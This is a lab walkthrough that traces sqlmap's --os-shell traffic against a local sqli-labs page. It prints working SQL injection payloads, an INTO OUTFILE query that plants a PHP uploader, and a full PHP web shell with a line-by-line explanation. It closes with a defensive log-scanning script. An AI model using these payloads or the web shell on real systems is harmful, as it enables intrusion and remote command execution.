D:\sqlmap>python2 sqlmap.py -u http://127.0.0.1/SQL/Less-1/?id=1 --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:10:10

[23:10:10] [INFO] resuming back-end DBMS 'mysql'
[23:10:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3621=3621 AND 'GLUP'='GLUP

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT (ELT(3041=3041,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ErWL'='ErWL

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'spJe'='spJe

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3185' UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4362634876576a754d757a6b534357506b55784569476b68786c616f6179476a796c464c6479666e,0x7171787a71),NULL-- KQNY
---
[23:10:10] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.37, PHP 5.6.37
back-end DBMS: MySQL >= 5.0
[23:10:10] [INFO] going to use a web backdoor for command prompt
[23:10:10] [INFO] fingerprinting the back-end DBMS operating system
[23:10:10] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: E:\www\apache\Apache24\htdocs
[23:10:50] [WARNING] unable to automatically parse any web server path
[23:10:50] [INFO] trying to upload the file stager on 'E:/www/apache/Apache24/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[23:10:50] [INFO] the file stager has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpumgnt.php
[23:10:50] [INFO] the backdoor has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpbwejn.php
[23:10:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'desktop-ei9lgn7\bxscope'
os-shell>
GET /SQL/Less-1/?id=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
This time sqlmap made only a simple GET request, presumably to check that the target is reachable.
Note the User-Agent here: sqlmap/1.2.11#stable (http://sqlmap.org). By default sqlmap announces itself in the User-Agent header, so this value shows up verbatim in the web server's access log.
The local server then returned a response packet containing the normal page content.
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:10 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 721
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font size='5' color= '#99FF00'>Your Login name:Dumb<br>Your Password:Dumb</font></font>
</div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
This request was made right after the following event:
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root
This time sqlmap appended %5B%5D to the id parameter, which decodes to [], so the parameter was passed to the server as an array. Is the idea to make the site throw an error that leaks the site's path? I haven't read the source, so I'm not sure...
The response returned this time differs from the first one.
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:27 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font color= "#FFFF00"></font></font>
</div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%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--%20- HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
You will notice that the parameter of this third request is very long; URL-decoded it reads as follows:
id=-1086' OR 3105=3105 LIMIT 0,1 INTO OUTFILE 'E:/www/apache/Apache24/htdocs/tmpumgnt.php' LINES TERMINATED BY <?php if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\\www\\apache\\Apache24\\htdocs\\> <input type=submit name=upload value=upload></form>";}?>
It uses MySQL's SELECT ... INTO OUTFILE ... LINES TERMINATED BY to write the script onto the server: the query returns no rows, and the PHP source supplied as the line terminator is what ends up in the output file.
The code, expanded, is as follows:
<?php
if (isset($_REQUEST["upload"])){
    $dir=$_REQUEST["uploadDir"];
    if (phpversion()<'4.1.0'){
        $file=$HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }
    else{
        $file=$_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }
    @chmod($dir."/".$file,0755);
    echo "File uploaded";
}
else {
    echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\\www\\apache\\Apache24\\htdocs\\> <input type=submit name=upload value=upload></form>";
}
?>
This stager provides a file-upload function: a POST with the upload field set moves the uploaded file into the directory given by uploadDir, otherwise it renders the upload form.
The response returned this time is exactly the same as the second one.
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font color= "#FFFF00"></font></font>
</div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
GET /www/apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 237
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /www/apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

GET /apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 233
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

GET /Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

GET /htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

GET /tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 330
Connection: close
Content-Type: text/html; charset=UTF-8

1 Dumb Dumb<form action=/tmpumgnt.php method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>
POST /tmpumgnt.php?id=1 HTTP/1.1
Content-Length: 1334
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Host: 127.0.0.1
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=169.254.227.55.1.10780.1558019450.459.1

--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="uploadDir"

E:\www\apache\Apache24\htdocs\
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="upload"

1
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="file"; filename="tmpbwejn.php"
Content-Type: application/octet-stream

<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
--169.254.227.55.1.10780.1558019450.459.1--
The code, expanded:
<?php
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);
$z=@ini_get('disable_functions');
if(!empty($z)){
    $z=preg_replace('/[, ]+/',',',$z);
    $z=explode(',',$z);
    $z=array_map('trim',$z);
}
else{
    $z=array();
}
$c=$c." 2>&1\n";
function f($n){
    global $z;
    return is_callable($n)and!in_array($n,$z);
}
if(f('system')){
    ob_start();
    system($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('proc_open')){
    $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
    $w=NULL;
    while(!feof($t[1])){
        $w.=fread($t[1],512);
    }
    @proc_close($y);
}
elseif(f('shell_exec')){
    $w=shell_exec($c);
}
elseif(f('passthru')){
    ob_start();
    passthru($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('popen')){
    $x=popen($c,r);
    $w=NULL;
    if(is_resource($x)){
        while(!feof($x)){
            $w.=fread($x,512);
        }
    }
    @pclose($x);
}
elseif(f('exec')){
    $w=array();
    exec($c,$w);
    $w=join(chr(10),$w).chr(10);
}
else{
    $w=0;
}
print "<pre>".$w."</pre>";
?>
The script first takes the value of cmd from the client request and assigns it to $c.
It sets the script's maximum execution time to unlimited.
It keeps the script running even if the client disconnects.
It reads the list of disabled functions (disable_functions) from the PHP configuration and assigns it to $z.
If the disabled-function list $z is not empty, it collapses the comma/space separators, splits the list on commas and trims each entry.
If the disabled-function list is empty, $z is initialised to an empty array.
Then $c=$c." 2>&1\n", so the command's stderr is merged into its stdout.
It defines the function f($n), which returns true when the function named $n is callable and is not in the disabled list $z.
If f('system') is true, the command is run with system() and its output captured via output buffering.
Otherwise, if f('proc_open') is true, the command is run with proc_open() and its stdout pipe is read in 512-byte chunks.
Otherwise, if f('shell_exec') is true, shell_exec() is used.
Otherwise, if f('passthru') is true, passthru() is used with output buffering.
Otherwise, if f('popen') is true, the command's output is read from popen().
Otherwise, if f('exec') is true, exec() is used and the output lines are joined with newlines.
Otherwise $w is set to 0.
Finally it does print "<pre>".$w."</pre>".
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 24
Connection: close
Content-Type: text/html; charset=UTF-8

1 Dumb DumbFile uploaded

GET /tmpbwejn.php?cmd=echo%20command%20execution%20test HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>command execution test
</pre>

GET /tmpbwejn.php?cmd=whoami HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:11:08 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>desktop-ei9lgn7\bxscope
</pre>
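As an added defender-side example (my code, not from the page or from sqlmap itself), here is a small Python scanner that reads Apache combined-format access-log lines and flags each stage of the --os-shell sequence traced above: the sqlmap User-Agent, the id[]= full-path-disclosure probe, the INTO OUTFILE stager write, the POST to the temporary stager, and the cmd= requests to the backdoor. The log lines are constructed to mirror the page's requests, and the temp-file name pattern is an assumption taken from the two names seen here (tmpumgnt, tmpbwejn).

```python
import re
from urllib.parse import unquote_plus
# Constructed Apache combined-format log lines modelled on the requests shown on this
# page (sqlmap 1.2.11 against Less-1 on 127.0.0.1); they are not the page's real log.
SAMPLE_LOG = r'''
127.0.0.1 - - [16/May/2019:23:10:10 +0800] "GET /SQL/Less-1/?id=1 HTTP/1.1" 200 721 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:27 +0800] "GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1" 200 670 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:50 +0800] "GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%20%3C%3Fphp... HTTP/1.1" 200 670 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:10:50 +0800] "POST /tmpumgnt.php?id=1 HTTP/1.1" 200 24 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
127.0.0.1 - - [16/May/2019:23:11:08 +0800] "GET /tmpbwejn.php?cmd=whoami HTTP/1.1" 200 36 "-" "sqlmap/1.2.11#stable (http://sqlmap.org)"
10.0.0.5 - - [16/May/2019:23:12:00 +0800] "GET /SQL/Less-1/?id=2 HTTP/1.1" 200 721 "-" "Mozilla/5.0"
'''
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
def parse_line(line):
    """Parse one combined-format line (None if it does not parse). The URL is
    percent-decoded so payloads sent as %20/%27/%5B become readable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = unquote_plus(rec["url"]).partition("?")
    return rec
# One rule per stage of the --os-shell sequence seen on this page. The temp-name pattern
# (tmp + five lowercase letters, as in tmpumgnt/tmpbwejn) is an assumption: other names
# are possible, so treat that rule as a hint rather than proof.
RULES = [
    ("sqlmap user-agent", lambda r: "sqlmap" in r["ua"].lower()),
    # id[]=1: the array-parameter request sqlmap sends to provoke full path disclosure
    ("array-parameter FPD probe", lambda r: re.search(r"(^|&)[^=&]*\[\]=", r["query"]) is not None),
    # the stager written with SELECT ... INTO OUTFILE ... LINES TERMINATED BY
    ("INTO OUTFILE file write", lambda r: re.search(r"\bINTO\s+OUTFILE\b", r["query"], re.I) is not None),
    ("POST to temp stager", lambda r: r["method"] == "POST"
                                      and re.fullmatch(r"/tmp[a-z]{5}\.php", r["path"]) is not None),
    # the backdoor takes its command from a cmd= parameter
    ("web shell cmd parameter", lambda r: r["path"].endswith(".php")
                                          and re.search(r"(^|&)cmd=", r["query"]) is not None),
]
def scan(log_text):
    """Return one finding per suspicious line, in log order: {ip, ts, path, hits}."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [name for name, check in RULES if check(rec)]
        if hits:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"], "hits": hits})
    return findings
```

Running scan(SAMPLE_LOG) flags the five sqlmap lines and leaves the ordinary browser request alone; the INTO OUTFILE and cmd= rules also fire without the tell-tale User-Agent, which matters because that header is trivial to change.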